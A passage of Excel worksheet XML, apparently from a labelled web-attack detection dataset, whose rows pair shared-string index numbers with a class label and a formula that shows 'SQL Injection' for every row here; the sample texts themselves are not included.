    <row r="18211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18211" s="1" t="s">
        <v>13767</v>
      </c>
      <c r="B18211">
        <v>1</v>
      </c>
      <c r="C18211" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18212" s="1" t="s">
        <v>19267</v>
      </c>
      <c r="B18212">
        <v>1</v>
      </c>
      <c r="C18212" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18213" s="1" t="s">
        <v>17072</v>
      </c>
      <c r="B18213">
        <v>1</v>
      </c>
      <c r="C18213" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18214" s="1" t="s">
        <v>12886</v>
      </c>
      <c r="B18214">
        <v>1</v>
      </c>
      <c r="C18214" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18215" s="1" t="s">
        <v>18721</v>
      </c>
      <c r="B18215">
        <v>1</v>
      </c>
      <c r="C18215" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18216" s="1" t="s">
        <v>19607</v>
      </c>
      <c r="B18216">
        <v>1</v>
      </c>
      <c r="C18216" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18217" s="1" t="s">
        <v>25705</v>
      </c>
      <c r="B18217">
        <v>1</v>
      </c>
      <c r="C18217" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18218" s="1" t="s">
        <v>15489</v>
      </c>
      <c r="B18218">
        <v>1</v>
      </c>
      <c r="C18218" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18219" s="1" t="s">
        <v>13772</v>
      </c>
      <c r="B18219">
        <v>1</v>
      </c>
      <c r="C18219" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18220" s="1" t="s">
        <v>19341</v>
      </c>
      <c r="B18220">
        <v>1</v>
      </c>
      <c r="C18220" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18221" s="1" t="s">
        <v>15840</v>
      </c>
      <c r="B18221">
        <v>1</v>
      </c>
      <c r="C18221" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18222" s="1" t="s">
        <v>15282</v>
      </c>
      <c r="B18222">
        <v>1</v>
      </c>
      <c r="C18222" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18223" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18223" s="1" t="s">
        <v>14181</v>
      </c>
      <c r="B18223">
        <v>1</v>
      </c>
      <c r="C18223" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18224" s="1" t="s">
        <v>14074</v>
      </c>
      <c r="B18224">
        <v>1</v>
      </c>
      <c r="C18224" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18225" s="1" t="s">
        <v>25698</v>
      </c>
      <c r="B18225">
        <v>1</v>
      </c>
      <c r="C18225" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18226" s="1" t="s">
        <v>12137</v>
      </c>
      <c r="B18226">
        <v>1</v>
      </c>
      <c r="C18226" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18227" s="1" t="s">
        <v>17702</v>
      </c>
      <c r="B18227">
        <v>1</v>
      </c>
      <c r="C18227" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18228" s="1" t="s">
        <v>15364</v>
      </c>
      <c r="B18228">
        <v>1</v>
      </c>
      <c r="C18228" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18229" s="1" t="s">
        <v>15727</v>
      </c>
      <c r="B18229">
        <v>1</v>
      </c>
      <c r="C18229" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18230" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18230" s="1" t="s">
        <v>13837</v>
      </c>
      <c r="B18230">
        <v>1</v>
      </c>
      <c r="C18230" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18231" s="1" t="s">
        <v>17539</v>
      </c>
      <c r="B18231">
        <v>1</v>
      </c>
      <c r="C18231" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18232" s="1" t="s">
        <v>19203</v>
      </c>
      <c r="B18232">
        <v>1</v>
      </c>
      <c r="C18232" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18233" s="1" t="s">
        <v>19402</v>
      </c>
      <c r="B18233">
        <v>1</v>
      </c>
      <c r="C18233" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18234" s="1" t="s">
        <v>19798</v>
      </c>
      <c r="B18234">
        <v>1</v>
      </c>
      <c r="C18234" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18235" s="1" t="s">
        <v>18454</v>
      </c>
      <c r="B18235">
        <v>1</v>
      </c>
      <c r="C18235" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18236" s="1" t="s">
        <v>18900</v>
      </c>
      <c r="B18236">
        <v>1</v>
      </c>
      <c r="C18236" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18237" s="1" t="s">
        <v>14183</v>
      </c>
      <c r="B18237">
        <v>1</v>
      </c>
      <c r="C18237" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18238" s="1" t="s">
        <v>14698</v>
      </c>
      <c r="B18238">
        <v>1</v>
      </c>
      <c r="C18238" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18239" s="1" t="s">
        <v>26308</v>
      </c>
      <c r="B18239">
        <v>1</v>
      </c>
      <c r="C18239" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18240" s="1" t="s">
        <v>17026</v>
      </c>
      <c r="B18240">
        <v>1</v>
      </c>
      <c r="C18240" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18241" s="1" t="s">
        <v>16278</v>
      </c>
      <c r="B18241">
        <v>1</v>
      </c>
      <c r="C18241" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18242" s="1" t="s">
        <v>12082</v>
      </c>
      <c r="B18242">
        <v>1</v>
      </c>
      <c r="C18242" s="7" t="str">
        <f t="shared" si="284"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18243" s="1" t="s">
        <v>13794</v>
      </c>
      <c r="B18243">
        <v>1</v>
      </c>
      <c r="C18243" s="7" t="str">
        <f t="shared" ref="C18243:C18306" si="285">IF(B18243=0,"No Attack", IF(B18243=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18244" s="1" t="s">
        <v>12549</v>
      </c>
      <c r="B18244">
        <v>1</v>
      </c>
      <c r="C18244" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18245" s="1" t="s">
        <v>17042</v>
      </c>
      <c r="B18245">
        <v>1</v>
      </c>
      <c r="C18245" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18246" s="1" t="s">
        <v>17176</v>
      </c>
      <c r="B18246">
        <v>1</v>
      </c>
      <c r="C18246" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18247" s="1" t="s">
        <v>12627</v>
      </c>
      <c r="B18247">
        <v>1</v>
      </c>
      <c r="C18247" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18248" s="1" t="s">
        <v>25352</v>
      </c>
      <c r="B18248">
        <v>1</v>
      </c>
      <c r="C18248" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18249" s="1" t="s">
        <v>18358</v>
      </c>
      <c r="B18249">
        <v>1</v>
      </c>
      <c r="C18249" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18250" s="1" t="s">
        <v>14959</v>
      </c>
      <c r="B18250">
        <v>1</v>
      </c>
      <c r="C18250" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18251" s="1" t="s">
        <v>26667</v>
      </c>
      <c r="B18251">
        <v>1</v>
      </c>
      <c r="C18251" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18252" s="1" t="s">
        <v>15990</v>
      </c>
      <c r="B18252">
        <v>1</v>
      </c>
      <c r="C18252" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18253" s="1" t="s">
        <v>17987</v>
      </c>
      <c r="B18253">
        <v>1</v>
      </c>
      <c r="C18253" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18254" s="1" t="s">
        <v>17611</v>
      </c>
      <c r="B18254">
        <v>1</v>
      </c>
      <c r="C18254" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18255" s="1" t="s">
        <v>18312</v>
      </c>
      <c r="B18255">
        <v>1</v>
      </c>
      <c r="C18255" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18256" s="1" t="s">
        <v>12511</v>
      </c>
      <c r="B18256">
        <v>1</v>
      </c>
      <c r="C18256" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18257" s="1" t="s">
        <v>16988</v>
      </c>
      <c r="B18257">
        <v>1</v>
      </c>
      <c r="C18257" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18258" s="1" t="s">
        <v>13428</v>
      </c>
      <c r="B18258">
        <v>1</v>
      </c>
      <c r="C18258" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18259" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18259" s="1" t="s">
        <v>16723</v>
      </c>
      <c r="B18259">
        <v>1</v>
      </c>
      <c r="C18259" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18260" s="1" t="s">
        <v>26801</v>
      </c>
      <c r="B18260">
        <v>1</v>
      </c>
      <c r="C18260" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18261" s="1" t="s">
        <v>26672</v>
      </c>
      <c r="B18261">
        <v>1</v>
      </c>
      <c r="C18261" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18262" s="1" t="s">
        <v>12489</v>
      </c>
      <c r="B18262">
        <v>1</v>
      </c>
      <c r="C18262" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18263" s="1" t="s">
        <v>14740</v>
      </c>
      <c r="B18263">
        <v>1</v>
      </c>
      <c r="C18263" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18264" s="1" t="s">
        <v>18304</v>
      </c>
      <c r="B18264">
        <v>1</v>
      </c>
      <c r="C18264" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18265" s="1" t="s">
        <v>16936</v>
      </c>
      <c r="B18265">
        <v>1</v>
      </c>
      <c r="C18265" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18266" s="1" t="s">
        <v>12073</v>
      </c>
      <c r="B18266">
        <v>1</v>
      </c>
      <c r="C18266" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18267" s="1" t="s">
        <v>13985</v>
      </c>
      <c r="B18267">
        <v>1</v>
      </c>
      <c r="C18267" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18268" s="1" t="s">
        <v>13340</v>
      </c>
      <c r="B18268">
        <v>1</v>
      </c>
      <c r="C18268" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18269" s="1" t="s">
        <v>16868</v>
      </c>
      <c r="B18269">
        <v>1</v>
      </c>
      <c r="C18269" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18270" s="1" t="s">
        <v>17420</v>
      </c>
      <c r="B18270">
        <v>1</v>
      </c>
      <c r="C18270" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18271" s="1" t="s">
        <v>14938</v>
      </c>
      <c r="B18271">
        <v>1</v>
      </c>
      <c r="C18271" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18272" s="1" t="s">
        <v>19701</v>
      </c>
      <c r="B18272">
        <v>1</v>
      </c>
      <c r="C18272" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18273" s="1" t="s">
        <v>16790</v>
      </c>
      <c r="B18273">
        <v>1</v>
      </c>
      <c r="C18273" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18274" s="1" t="s">
        <v>17797</v>
      </c>
      <c r="B18274">
        <v>1</v>
      </c>
      <c r="C18274" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18275" s="1" t="s">
        <v>16293</v>
      </c>
      <c r="B18275">
        <v>1</v>
      </c>
      <c r="C18275" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18276" s="1" t="s">
        <v>25510</v>
      </c>
      <c r="B18276">
        <v>1</v>
      </c>
      <c r="C18276" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18277" s="1" t="s">
        <v>15356</v>
      </c>
      <c r="B18277">
        <v>1</v>
      </c>
      <c r="C18277" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18278" s="1" t="s">
        <v>12212</v>
      </c>
      <c r="B18278">
        <v>1</v>
      </c>
      <c r="C18278" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18279" s="1" t="s">
        <v>12339</v>
      </c>
      <c r="B18279">
        <v>1</v>
      </c>
      <c r="C18279" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18280" s="1" t="s">
        <v>17977</v>
      </c>
      <c r="B18280">
        <v>1</v>
      </c>
      <c r="C18280" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18281" s="1" t="s">
        <v>18765</v>
      </c>
      <c r="B18281">
        <v>1</v>
      </c>
      <c r="C18281" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18282" s="1" t="s">
        <v>15195</v>
      </c>
      <c r="B18282">
        <v>1</v>
      </c>
      <c r="C18282" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18283" s="1" t="s">
        <v>14155</v>
      </c>
      <c r="B18283">
        <v>1</v>
      </c>
      <c r="C18283" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18284" s="1" t="s">
        <v>12749</v>
      </c>
      <c r="B18284">
        <v>1</v>
      </c>
      <c r="C18284" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18285" s="1" t="s">
        <v>26528</v>
      </c>
      <c r="B18285">
        <v>1</v>
      </c>
      <c r="C18285" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18286" s="1" t="s">
        <v>15129</v>
      </c>
      <c r="B18286">
        <v>1</v>
      </c>
      <c r="C18286" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18287" s="1" t="s">
        <v>25293</v>
      </c>
      <c r="B18287">
        <v>1</v>
      </c>
      <c r="C18287" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18288" s="1" t="s">
        <v>13433</v>
      </c>
      <c r="B18288">
        <v>1</v>
      </c>
      <c r="C18288" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18289" s="1" t="s">
        <v>24735</v>
      </c>
      <c r="B18289">
        <v>1</v>
      </c>
      <c r="C18289" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18290" s="1" t="s">
        <v>14965</v>
      </c>
      <c r="B18290">
        <v>1</v>
      </c>
      <c r="C18290" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18291" s="1" t="s">
        <v>18715</v>
      </c>
      <c r="B18291">
        <v>1</v>
      </c>
      <c r="C18291" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18292" s="1" t="s">
        <v>18166</v>
      </c>
      <c r="B18292">
        <v>1</v>
      </c>
      <c r="C18292" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18293" s="1" t="s">
        <v>16099</v>
      </c>
      <c r="B18293">
        <v>1</v>
      </c>
      <c r="C18293" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18294" s="1" t="s">
        <v>14994</v>
      </c>
      <c r="B18294">
        <v>1</v>
      </c>
      <c r="C18294" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18295" s="1" t="s">
        <v>14539</v>
      </c>
      <c r="B18295">
        <v>1</v>
      </c>
      <c r="C18295" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18296" s="1" t="s">
        <v>26753</v>
      </c>
      <c r="B18296">
        <v>1</v>
      </c>
      <c r="C18296" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18297" s="1" t="s">
        <v>17186</v>
      </c>
      <c r="B18297">
        <v>1</v>
      </c>
      <c r="C18297" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18298" s="1" t="s">
        <v>18756</v>
      </c>
      <c r="B18298">
        <v>1</v>
      </c>
      <c r="C18298" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18299" s="1" t="s">
        <v>19103</v>
      </c>
      <c r="B18299">
        <v>1</v>
      </c>
      <c r="C18299" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18300" s="1" t="s">
        <v>18819</v>
      </c>
      <c r="B18300">
        <v>1</v>
      </c>
      <c r="C18300" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18301" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18301" s="1" t="s">
        <v>24516</v>
      </c>
      <c r="B18301">
        <v>1</v>
      </c>
      <c r="C18301" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18302" s="1" t="s">
        <v>26491</v>
      </c>
      <c r="B18302">
        <v>1</v>
      </c>
      <c r="C18302" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18303" s="1" t="s">
        <v>24707</v>
      </c>
      <c r="B18303">
        <v>1</v>
      </c>
      <c r="C18303" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18304" s="1" t="s">
        <v>19831</v>
      </c>
      <c r="B18304">
        <v>1</v>
      </c>
      <c r="C18304" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18305" s="1" t="s">
        <v>19359</v>
      </c>
      <c r="B18305">
        <v>1</v>
      </c>
      <c r="C18305" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18306" s="1" t="s">
        <v>13127</v>
      </c>
      <c r="B18306">
        <v>1</v>
      </c>
      <c r="C18306" s="7" t="str">
        <f t="shared" si="285"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18307" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18307" s="1" t="s">
        <v>18878</v>
      </c>
      <c r="B18307">
        <v>1</v>
      </c>
      <c r="C18307" s="7" t="str">
        <f t="shared" ref="C18307:C18370" si="286">IF(B18307=0,"No Attack", IF(B18307=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18308" s="1" t="s">
        <v>17653</v>
      </c>
      <c r="B18308">
        <v>1</v>
      </c>
      <c r="C18308" s="7" t="str">
        <f t="shared" si="286"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18309" s="1" t="s">
        <v>15798</v>
      </c>
      <c r="B18309">
        <v>1</v>
      </c>
      <c r="C18309" s="7" t="str">
        <f t="shared" si="286"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18310" s="1" t="s">
        <v>25768</v>
      </c>
      <c r="B18310">
        <v>1</v>
      </c>
      <c r="C18310" s="7" t="str">
        <f t="shared" si="286"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18311" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18311" s="1" t="s">
        <v>25076</v>
      </c>
      <c r="B18311">
        <v>1</v>
      </c>
      <c r="C18311" s="7" t="str">
        <f t="shared" si="286"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18312" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18312" s="1" t="s">
        <v>25158</v>
      </c>
      <c r="B18312">
        <v>1</v>
      </c>
      <c r="C18312" s="7" t="str">
        <f t="shared" si="286"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18313" s="1" t="s">
        <v>13028</v>
